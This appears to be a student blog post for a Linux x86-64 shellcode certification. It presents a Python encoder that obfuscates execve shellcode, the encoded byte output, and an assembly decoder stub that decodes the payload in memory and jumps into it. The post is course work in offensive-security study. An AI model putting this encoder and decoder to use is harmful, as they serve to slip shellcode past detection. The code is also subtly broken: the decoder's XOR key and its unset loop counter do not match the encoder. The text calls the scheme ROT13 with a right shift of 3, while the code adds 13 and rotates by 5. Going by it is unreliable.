This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert (SLAE64) certification:
https://www.pentesteracademy.com/course?id=7
Student-ID: PA-15847
The Objectives for the Assignment:
– create a custom encoding scheme like the Insertion Encoder
– PoC with execve stack as the shellcode to encode with your scheme and execute
So we used the following python code by using a mixed usage of ROT 13, XOR and Right Shift 3 encoding scheme.
def ror(val, rot):
return ((val & 0xff) >> rot % 8 ) | (val << ( 8 - (rot % 8)) & 0xff)
def main():
shellcode = (".....shellcode-here.....")
encoded = ""
i = len(bytearray(shellcode))
for x in bytearray(shellcode):
y = ror(((x+13)^i),5)
encoded += "0x"
encoded += "%02x," % y
i -= 1
print "\t",encoded[:-1]
if __name__ == "__main__":
main()It will give us the following results:
0x5d,0x48,0xf4,0x10,0x52,0xf4,0x89,0x9d,0x9b,0x1b,0x8a,0x4a,0x25,0x99,0x9c,0x11,0xa1,0xfe,0xd4,0x16,0xa6,0x39,0x9b,0x17,0xa7,0x3d,0xd4,0x65,0x72,0xd2,0x87,0xc4
Now we will use the decoder just as described in the class using jmp-call-pop technique:
global _start
section .text
_start:
jmp real_start
encoded_shellcode: db .....encoded-shellcode-here....
real_start:
lea rsi, [rel encoded_shellcode]
decoder:
xor rax, rax
add al, 32
decode:
rol byte [rsi], 0x5
xor byte [rsi], al
sub byte [rsi], 13
inc rsi
loop decode
jmp short encoded_shellcodeWe’ll compile and run the code to get the original shellcode 🙂
For the full code, please check the Github repository: